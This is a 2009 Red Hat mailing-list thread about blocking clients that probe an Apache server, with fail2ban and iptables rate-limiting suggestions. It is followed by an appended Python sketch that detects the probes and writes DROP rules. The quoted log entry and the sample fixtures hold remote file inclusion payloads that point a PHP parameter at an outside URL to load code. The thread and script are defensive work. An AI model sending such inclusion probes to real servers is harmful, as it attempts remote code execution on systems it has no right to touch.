2009/7/8 Manuel Aróstegui <manuel@xxxxxxxxxxxxxx>

> On Wed, 08-07-2009 at 09:58 +0200, ESGLinux wrote:
> > Hi all,
> > I'm having a problem with an Apache web server.
> >
> > I get a lot of accesses of this kind:
> >
> > x.x.x.x - - [08/Jul/2009:09:42:20 +0200] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 1015 "-" "Mozilla/5.0"
> >
> > where x.x.x.x is the IP of the client, I suppose this IP is trying to find a
> > security hole in my system, so what I do manually is this:
> >
> > iptables -A INPUT -s x.x.x.x -p tcp -m tcp --dport 80 -j DROP
> >
> > I want to do this automatically. I'm thinking to use logwatch but I'm not
> > sure how to do it. (I'm testing but for the moment I haven't found the
> > solution)
>
> You might want to test fail2ban:
> http://www.fail2ban.org/wiki/index.php/Main_Page

Hey, I think this software does exactly what I want. I'm going to give it a try.

> > By the way, I'm interested in limiting the connections to my webserver using
> > iptables with the limit module and burst argument. What do you think about it?
> > Is it a good solution or am I on the wrong way? Do you know how to prevent DOS
> > attacks?
>
> The first approach that comes to my mind would be something like:
>
> iptables -N APACHE_CHECK
> iptables -A INPUT -p tcp --dport 80 -m state --state NEW -j APACHE_CHECK
> iptables -A APACHE_CHECK -m state --state NEW -m recent --set --name APACHE
> iptables -A APACHE_CHECK -m state --state NEW -m recent --update --seconds 60 --hitcount 4 --name APACHE
> iptables -A APACHE_CHECK -m state --state NEW -m recent --rcheck --seconds 60 --hitcount 4 --name APACHE -j DROP
>
> This will prevent you from small DoS attempts from the same IP within 1
> minute.

I like this kind of solution but I think these rules don't work. With them the webserver does not respond to a single petition.

I have loaded this in my test computer:

iptables -N APACHE_CHECK
iptables -A INPUT -p tcp --dport 80 -m state --state NEW -j APACHE_CHECK
iptables -A APACHE_CHECK -m state --state NEW -m recent --set --name APACHE
iptables -A APACHE_CHECK -m state --state NEW -m recent --update --seconds 60 --hitcount 4 --name APACHE
iptables -A APACHE_CHECK -m state --state NEW -m recent --rcheck --seconds 60 --hitcount 4 --name APACHE -j LOG
iptables -A APACHE_CHECK -m state --state NEW -m recent --rcheck --seconds 60 --hitcount 4 --name APACHE -j DROP

I have added the rule to log when the packets are dropped and it logs every packet, what is wrong?

Thanks for your answer

ESG

> Manuel.
> --
> Manuel Arostegui Ramirez.
>
> Electronic Mail is not secure, might not be read every day, and should not
> be used for urgent or sensitive issues.
>
> --
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list
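
The manual step described in the message above (spot the include-path probe in the access log, then add a DROP rule for its source), sketched as an added example that is not part of the original thread or of fail2ban. It generalizes from CONFIG[pear_dir] to any query parameter whose value is a remote URL; the function names, the threshold and the sample log lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from collections import Counter
from urllib.parse import parse_qsl

# Apache common/combined log line: client address, then the quoted request line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (.*?) HTTP/[\d.]+" \d{3} ')
# A parameter value that is itself a remote URL, as in CONFIG[pear_dir]=http://...
REMOTE_URL = re.compile(r'(?:https?|ftp)://', re.I)

# Constructed sample lines (documentation addresses, .invalid hosts).
SAMPLE = [
    '192.0.2.10 - - [08/Jul/2009:09:42:20 +0200] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://files.example.invalid//id1.txt??? HTTP/1.1" 404 1015 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [08/Jul/2009:09:42:21 +0200] "GET /index.php?path=http%3A%2F%2Ffiles.example.invalid%2Fid1.txt HTTP/1.1" 404 1015 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Jul/2009:09:43:02 +0200] "GET /share.php?u=http://www.example.invalid/page HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [08/Jul/2009:09:44:10 +0200] "GET /search.php?q=iptables+limit HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]

def is_include_probe(target):
    """True if any query parameter value (after %-decoding) starts with a URL scheme."""
    query = target.partition("?")[2]
    return any(REMOTE_URL.match(v.strip()) for _, v in parse_qsl(query))

def offenders(lines, threshold=1):
    """Return {client: probe_count} for clients with at least `threshold` probes."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_include_probe(m.group(2)):
            hits[m.group(1)] += 1
    return {client: n for client, n in hits.items() if n >= threshold}

def drop_rules(clients):
    """Render the DROP rule from the post for each valid IPv4 address; skip the rest."""
    rules = []
    for client in sorted(clients):
        try:
            ip = ipaddress.IPv4Address(client)
        except ValueError:
            continue  # hostname or junk in the log field: never put it in a command
        rules.append(f"iptables -A INPUT -s {ip} -p tcp -m tcp --dport 80 -j DROP")
    return rules

if __name__ == "__main__":
    # threshold=2 leaves out 198.51.100.7, whose single URL parameter may be legitimate.
    print("\n".join(drop_rules(offenders(SAMPLE, threshold=2))))
```
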